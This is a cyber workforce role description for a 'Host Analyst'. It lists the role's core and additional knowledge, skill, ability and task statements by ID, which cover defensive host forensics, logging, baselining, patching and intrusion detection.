Host Analyst
A Host Analyst (HA) will have knowledge of various system configurations encountered. This work role also performs analysis using built-in tools and capabilities. A Host Analyst will have knowledge of system services and the security and configuration of them, as well as knowledge of file systems, permissions, and operation system configurations. The Host Analyst conducts analysis using built-in tools and capabilities.
Core KSATs
KSAT ID | Description | KSAT |
---|---|---|
22 | * Knowledge of computer networking concepts and protocols, and network security methodologies. |
Knowledge |
108 | * Knowledge of risk management processes (e.g., methods for assessing and mitigating risk). |
Knowledge |
1157 | * Knowledge of national and international laws, regulations, policies, and ethics as they relate to cybersecurity. |
Knowledge |
1158 | * Knowledge of cybersecurity principles. |
Knowledge |
1159 | * Knowledge of cyber threats and vulnerabilities. |
Knowledge |
6900 | * Knowledge of specific operational impacts of cybersecurity lapses. |
Knowledge |
6935 | * Knowledge of cloud computing service models Software as a Service (SaaS), Infrastructure as a Service (IaaS), and Platform as a Service (PaaS). |
Knowledge |
6938 | * Knowledge of cloud computing deployment models in private, public, and hybrid environment and the difference between on-premises and off-premises environments. |
Knowledge |
Additional KSATs
KSAT ID | Description | KSAT |
---|---|---|
4171 | Ability to analyze a finding of a compromise and develop a custom signature(s) and/or rule(s) to identify it throughout the network |
Ability |
4172 | Ability to analyze adversarial avenues of approach on a mission-critical system |
Ability |
4174 | Ability to analyze Data at Rest and Data in Transit encryption methodologies and assess Data at Rest and Data in Transit policies in support of identifying outliers to delineate possible avenues of approach. |
Ability |
4176 | Ability to analyze how the tools operate to enumerate the system |
Ability |
4179 | Ability to analyze multiple memory captures, determine anomalous behavior and developed a detailed report that includes timeline of compromise |
Ability |
4182 | Ability to analyze organizational policies and documentation for appropriate use and user privileges to determine current user access rights policies |
Ability |
4184 | Ability to analyze potentially malicious processes, libraries and modules on a system |
Ability |
4185 | Ability to analyze process lists within Windows, Unix, or Linux operating systems |
Ability |
4186 | Ability to analyze software installed and in use on a system, and on a host machine and compare it to the authorized software list provided by the network owner |
Ability |
4187 | Ability to analyze tools/hardware used to extract/analyze/capture memory and disk images |
Ability |
4188 | Ability to analyze user-mode/kernel mode rootkits and how they function and differ |
Ability |
4189 | Ability to analyze vulnerabilities and misconfiguration without Information Assurance artifacts. |
Ability |
4195 | Ability to build a baseline of configuration/state for host machines |
Ability |
4197 | Ability to capture a memory image from a host workstation |
Ability |
4198 | Ability to capture forensically sound memory and disk images with regard to timeline analysis |
Ability |
4206 | Ability to compare active user accounts on a network to appropriate Standard Operating Procedure (SOP), gather active user accounts on a network and compare to authorized user list |
Ability |
4207 | Ability to compare current state against baselines |
Ability |
4209 | Ability to compile group policies and access control lists from mission partner networks. |
Ability |
4210 | Ability to compile host-based firewall configurations and host intrusion prevention system through group policy modifications |
Ability |
4211 | Ability to conduct disk forensics on multiple images |
Ability |
4216 | Ability to configure log aggregation |
Ability |
4217 | Ability to configure, forward and statistically analyze logs |
Ability |
4225 | Ability to correlate indicators of compromise |
Ability |
4232 | Ability to de-obfuscate (e.g. command line execution, string substitution, clandestine side channel, Base64). |
Ability |
4234 | Ability to develop a risk defense plan (e.g. behavioral development, etc.) and put active measures in place in defense of a network, endpoint, and/or host. |
Ability |
4237 | Ability to develop dashboards to better visualize data |
Ability |
4238 | Ability to develop host-based IDS/IPS signatures and settings |
Ability |
4239 | Ability to develop the reporting and recording of discovered potentially malicious processes, libraries, and modules on a compromised system |
Ability |
4245 | Ability to enumerate domain security groups. |
Ability |
4246 | Ability to enumerate knowledge management applications (e.g. SharePoint) and their service accounts/security groups. |
Ability |
4247 | Ability to enumerate network shares and identify ACLs/security permissions and analyze for vulnerabilities/misconfigurations (e.g. SMB, NFS, ISCSI). |
Ability |
4250 | Ability to evaluate common Tactics, Techniques and Procedures (TTP) used in malware and open-source and Intelligence Community (IC) resources available to identify emerging TTPs |
Ability |
4251 | Ability to evaluate compliance with Security Technical Implementation Guides (STIGs) on host machines by utilizing a compliance scanner in support of identifying outliers in order to delineate possible avenues of approach |
Ability |
4252 | Ability to evaluate if patches are up to date for all hosts, determine current process for updating patches and determine current patch level for all hosts on a network according to NIST Special Publications 800-40 in support of identifying outliers in order to delineate possible avenues of approach. |
Ability |
4256 | Ability to evaluate rogue/unauthorized systems on a network |
Ability |
4257 | Ability to evaluate security posture shortcomings in group policy |
Ability |
4258 | Ability to evaluate steps taken after host-based IDS/IPS alerts, verify the finding and ensure its volatility |
Ability |
4259 | Ability to evaluate systems resiliency in adverse conditions |
Ability |
4262 | Ability to export/enumerate information (e.g., users, groups) from a Domain Controller. |
Ability |
4266 | Ability to identify activity context in log entries to correlate indicators of compromise. |
Ability |
4269 | Ability to identify anomalous network traffic on a host machine. |
Ability |
4273 | Ability to identify critical infrastructure systems with information communication technology that were designed without system security considerations. |
Ability |
4281 | Ability to identify new indicators of compromise through anomalous behavior in log entries. |
Ability |
4283 | Ability to identify security posture shortcomings |
Ability |
4284 | Ability to identify tools and techniques available for analyzing binary applications and interpreted scripts. |
Ability |
4287 | Ability to identify/select the most appropriate tools and solutions for the specific environment (e.g. disk/memory forensics/capture, host enumeration, application whitelisting, log aggregation and analysis, HIPS/HIDS solutions, etc.). |
Ability |
4288 | Ability to implement and configure host-based firewalls and host intrusion prevention systems |
Ability |
4289 | Ability to implement Data at Rest and Data in Transit encryption methodologies, Assess Data at Rest and Data in Transit polices. |
Ability |
4302 | Ability to measure known vulnerabilities against known vectors of approach. |
Ability |
4306 | Ability to monitor Active Directory (AD) for creation of unauthorized/potentially malicious accounts. |
Ability |
4309 | Ability to operate specified tools to enumerate a system. |
Ability |
4312 | Ability to organize Active Directories (AD) hierarchy structure. |
Ability |
4313 | Ability to organize logging and auditing procedures including server-based logging. |
Ability |
4315 | Ability to organize order of the volatility when capturing artifacts. |
Ability |
4318 | Ability to perform and analyze situational awareness commands within Windows, Unix, and Linux operating systems (e.g. system info, net stat, ipconfig, task list, ls, ifconfig, etc…) |
Ability |
4319 | Ability to perform and analyze vulnerability scans on host machines in support of identifying outliers in order to delineate possible avenues of approach. |
Ability |
4320 | Ability to perform complex root-cause analysis and recommend mitigations to determine root cause of an intrusion. |
Ability |
4323 | Ability to perform dynamic analysis. |
Ability |
4326 | Ability to perform static analysis. |
Ability |
4331 | Ability to prioritize how Operating System (OS) and application patches are distributed in different systems. |
Ability |
4332 | Ability to prioritize Operating Systems (OS) default processes, library, and modules based on boot order, dependencies, or key operations. |
Ability |
4337 | Ability to provide host analysis for Risk Mitigation Plan (RMP) to improve customer security overall posture. |
Ability |
4339 | Ability to provide mitigations to recover from a full network compromise. |
Ability |
4351 | Ability to select the best tools to enumerate a given set of host machines in order to validate whether they match known baselines. |
Ability |
4363 | Ability to use and integrate a Security Information and Event Management (SIEM) platform. |
Ability |
4371 | Ability to use host volatile data to compare active processes, libraries and modules against databases of known good/bad. |
Ability |
4375 | Ability to utilize Defense Information Systems Agency (DISA)/ Department of Defense (DoD) system configuration guidelines. |
Ability |
4390 | Knowledge of active directory federated services. |
Knowledge |
4413 | Knowledge of common information network malware (e.g., viruses, trojans, etc.) and vectors of attack (e.g., ports, attachments, etc.). |
Knowledge |
4415 | Knowledge of common obfuscation techniques (e.g. command line execution, string substitution, clandestine side channel, Base64). |
Knowledge |
4416 | Knowledge of common persistence locations within Windows, Unix, or Linux operating systems. |
Knowledge |
4427 | Knowledge of cybersecurity and cybersecurity-enabled software products. |
Knowledge |
4429 | Knowledge of cybersecurity controls and design principles and methods (e.g., firewalls, DMZ, and encryption). |
Knowledge |
4430 | Knowledge of cybersecurity Risk Management Framework (RMF) process. |
Knowledge |
4434 | Knowledge of DCO capabilities, including open-source tools, and their capabilities. |
Knowledge |
4435 | Knowledge of Defense-In-Depth principles. |
Knowledge |
4438 | Knowledge of different types of log subscriptions (e.g. push vs pull, MS Windows event forwarding, winlogbeat, syslog). |
Knowledge |
4443 | Knowledge of evasion strategies and TTPs (e.g., noise, stealth, situational awareness, bandwidth throttling). |
Knowledge |
4445 | Knowledge of existing cybersecurity principles, policies, and procedures |
Knowledge |
4452 | Knowledge of full-spectrum of cyberspace operations in an intelligence-driven DCO environment. |
Knowledge |
4501 | Knowledge of non-Active Directory domains (e.g. IDM, LDAP). |
Knowledge |
4522 | Knowledge of public key infrastructure (PKI) libraries, certificate authorities, certificate management, and encryption functionalities. |
Knowledge |
4537 | Knowledge of stream providers (e.g. KAFKA). |
Knowledge |
4539 | Knowledge of structured response frameworks (e.g. MITRE ATT&CK, Lockheed Martin Kill Chain, Diamond Model). |
Knowledge |
4583 | Knowledge of the U.S. Security System authorities, responsibilities, and contributions to the cyberspace operations mission. |
Knowledge |
4585 | Knowledge of the Windows registry hive keys and the information contained within each one. |
Knowledge |
4589 | Knowledge of typical system processes within Windows, Unix, or Linux operating systems |
Knowledge |
4595 | Knowledge of web applications and their common attack vectors. |
Knowledge |
4599 | Skill in analyzing endpoint collection data. |
Skill |
4655 | Skill in providing support to intelligence analysts to understand the operational environment and how it ties to intelligence reporting. |
Skill |
4660 | Skill in refining research (e.g., vulnerabilities, TTPs) to assist intelligence analysts’ preparation of products. |
Skill |
4665 | Skill in run level configurations in a Linux or UNIX environment |
Skill |
4679 | Skill in using various online tools for open-source research (e.g., online trade, DNS, mail, etc.). |
Skill |
8036 | Conduct open source research via various online tools. |
Task |
8041 | Confer with systems analysts, engineers, programmers, and others to design application and to obtain information on project limitations and capabilities, performance requirements, and interfaces. |
Task |
8111 | Identify potential points of strength and vulnerability among segments of a network map. |
Task |
8115 | Identify tools/hardware used to extract/analyze/capture memory and disk images. |
Task |
8151 | Perform security reviews and identify gaps in security architecture that can be used in the development of a security risk management plan. |
Task |
8161 | Provide and maintain documentation for TTPs as inputs to training programs. |
Task |
8212 | Validate intrusion detection system (IDS) alerts. |
Task |